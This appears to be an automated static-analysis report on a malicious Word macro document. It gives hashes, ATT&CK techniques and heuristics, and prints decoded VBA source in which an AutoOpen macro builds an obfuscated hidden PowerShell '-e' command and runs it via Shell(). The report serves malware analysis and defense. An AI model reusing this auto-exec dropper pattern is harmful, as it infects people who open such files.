Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ed4518c0e3a843b…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 102.0 KB
Created: 2018-05-30 16:23:00
Authoring application: Microsoft Office Word
First seen: 2018-06-14
MD5: 47752662ac368eab5743779742725456
SHA-1: 9cd3cbc038fce23fd33fa47743fd65dd42b15aa9
SHA-256: 2ed4518c0e3a843b298646e842f599dc883ac6cd85a189ad856c5347696b194a
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Word (OLE) document containing a VBA macro. The Autoopen macro runs as soon as the document is opened and calls the LnHfVTJFP function, which passes a string assembled by YbTCOY to Shell() with the window hidden (vbHide). The string is built from many small concatenated fragments and junk arithmetic intended to defeat signature matching; the readable fragments spell out a PowerShell invocation with a hidden window and an encoded (-e) command, so it is most likely a downloader that retrieves and executes a second-stage payload. The ClamAV detection (Doc.Dropper.Agent-6565825-0) also confirms its malicious nature.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6565825-0 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6565825-0
  • VBA macros detected (medium; 3 related findings; OLE_VBA_MACROS)
    The document contains VBA macro code.
  • Shell() call in VBA (critical; OLE_VBA_SHELL)
    The VBA code calls Shell() to execute a command string.
  • AutoOpen macro (high; OLE_VBA_AUTOOPEN)
    The document contains an AutoOpen macro, which runs automatically when the document is opened.
  • VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This heuristic catches p-code-only macro documents, and documents whose source extraction failed, where no visible macro source is available.
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it does not attribute the sample to a downloader family or to a parser CVE.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 18601 bytes
SHA-256: bc116e7d42a2baa47e8868828169bf244a0c568966789eafd2c7d580c0405d8f

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "HKcqvGlswc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YbTCOY()
On Error Resume Next
HWMBI = Atn(86919 * CInt(4158) + 69176 - 72694)
FkLnFR = 83156 + _
Log(7138) - iBYPE / Atn(68906) / kMwhQ / ptifv
mzlWA = Atn(61999 * CInt(62137) + 53328 - 84434)
afCip = 74969 + _
Log(98635) - HIRFIp / Atn(71362) / QwuRJ / VURYzi
YbTCOY = zDCNjrr + snpESIqq + JBuanwGFZj + FAZtJsC + AIuAIBkPdJ + DWsiSGDswG + wAPqzVUOv + JhZuLLErNF + GLToSipOh
jXILY = Atn(72885 * CInt(37050) + 59442 - 66106)
CuvXn = 10939 + _
Log(63666) - vlwPjj / Atn(50180) / zJiQR / UKYkJu
End Function
Sub Autoopen()
On Error Resume Next
ERYhds = Atn(45236 * CInt(27887) + 5422 - 67027)
kjBtb = 37095 + _
Log(77690) - lVmJwR / Atn(4359) / ZkzCw / HrTXiG
LnHfVTJFP (YbTCOY)
CowaUj = Atn(70631 * CInt(77056) + 52889 - 66679)
whJOR = 15881 + _
Log(55374) - ajzdD / Atn(62867) / zZKZE / inihpi
End Sub
Function LnHfVTJFP(KIQLHl)
On Error Resume Next
kRYwCu = Atn(10880 * CInt(28252) + 57701 - 86414)
LuRfI = 8968 + _
Log(20362) - uCjLdB / Atn(58026) / Ouahc / AfJHz
TGoYwM = izWsG + Chr(vbKeyP) + NqppzcKoD
IbDTjk = Atn(27443 * CInt(19060) + 38058 - 5142)
dWvoaB = 11583 + _
Log(89696) - XarUDL / Atn(93657) / tlWAEi / TwQftn
SAfVcXC = JcLLHV + Shell(bmIjLlXEXXM + TGoYwM + bwUcUP + KIQLHl + WYSqXKzIjd, vbHide)
zLPwL = Atn(64103 * CInt(70887) + 51293 - 58452)
MDDij = 67851 + _
Log(30601) - ncQij / Atn(59192) / nKVbl / BIDafE
End Function
Attribute VB_Name = "APATHSnB"
Function zDCNjrr()
On Error Resume Next
djlaLb = Atn(10789 * CInt(37768) + 59365 - 36903)
ZiGHFs = 62185 + _
Log(87455) - ZRllhQ / Atn(90765) / tojSzt / iBlXt
MIJErPcJcB = "owersHeLL -Wi" + "nDowsTyle h" + "idden " + "-e KAAoACgAIg" + "B7ADYA" + "NwB9AHsANQ" + "AwAH0Aew" + "A5ADEAfQ" + "B7ADEAMgAzAH0" + "AewAy"
Nwqblz = Atn(12351 * CInt(81834) + 32181 - 85918)
TRVMu = 1586 + _
Log(86336) - jUaqmW / Atn(53432) / tZEGJA / LUuJv
KwIzwK = "ADcAfQB7AD" + "YANgB9AHsANQA5A" + "H0AewAxADEAOAB9" + "AHsANAA2AH0Ae" + "wAxADEANQB9AHs" + "ANQAzAH0Ae"
oucwa = Atn(97544 * CInt(62255) + 45014 - 1986)
AscMdn = 13283 + _
Log(7919) - JOMRM / Atn(72992) / TQKrzr / drawtM
YHTuldmvC = "wAxADQAfQB7AD" + "IAfQB7ADU" + "ANgB9AHsAOQA4" + "AH0Ae" + "wAxADEANA"
vNslD = Atn(26791 * CInt(63363) + 76817 - 45214)
NqElC = 54127 + _
Log(55506) - KdfPN / Atn(17900) / JvwUCp / rjOAT
zCPMVlcZfS = "B9AHsAMgA2A" + "H0AewAxAD" + "AANgB9AHsANgA" + "yAH0AewA4A" + "DYAfQB7ADIA" + "OQB9AHsANAAxAH"
IYQftl = Atn(58074 * CInt(18169) + 73834 - 22790)
Pzijjt = 60990 + _
Log(662) - zuSiTV / Atn(67646) / wYWCI / HmMzWb
DiirthZCij = "0AewAzAH0Ae" + "wAyAD" + "EAfQB7" + "ADEAOAB9AHs" + "AMgAwAH0Ae" + "wA0ADkAfQB" + "7ADMA"
iWjXFE = Atn(13642 * CInt(55881) + 16134 - 75559)
AkiNFh = 23811 + _
Log(46045) - dKNoY / Atn(14119) / azWtJ / ETXiL
dzWhzDWRKvt = "MQB9AH" + "sANwAyAH0AewAxA" + "DAANQ" + "B9AHsAMwA3AH"
QcXql = Atn(77228 * CInt(3697) + 45856 - 28627)
jfnwYB = 37920 + _
Log(17358) - wzDjfl / Atn(88222) / bjOqW / wHaGU
jMDFfdBi = "0AewA1AH0AewAx" + "ADMAfQB" + "7ADEAMg" + "A0AH0A" + "ewAxADEAMQB9" + "AHsANwA1A" + "H0AewAxADA" + "ANwB9AHsAMQA" + "yAH0Aew"
AWjljR = Atn(83474 * CInt(11856) + 20365 - 99916)
zOoMQ = 25441 + _
Log(91460) - ErOarA / Atn(6770) / Iorwv / jucORz
JkRqV = "A0ADAA" + "fQB7ADkAMAB9AH" + "sANwA3AH0AewA2" + "AH0AewAxA" + "DEAOQ" + "B9AHsAMgAyAH" + "0AewAxADAANAB9" + "AHsAOQA3AH" + "0AewAxA" + "DAAMwB"
unPbd = Atn(29375 * CInt(52612) + 65872 - 19555)
tiNPlm = 92755 + _
Log(84103) - dHiRTB / Atn(14051) / iukBv / iKDzwO
YIdCzTYT = "9AHsANAA" + "1AH0AewA" + "2ADEAfQB7AD" + "cAOAB9AHsAMQ" + "A3AH0AewAzADY" + "AfQB7AD"
zDCNjrr = MIJErPcJcB + KwIzwK + YHTuldmvC + zCPMVlcZfS + DiirthZCij + dzWhzDWRKvt + jMDFfdBi + JkRqV + YIdCzTYT
End Function
Function snpESIqq()
On Error Resume Next
cbwGzT = Atn(64872 * CInt(68895) + 91162 - 15020)
WfWHLW = 92192
... (truncated)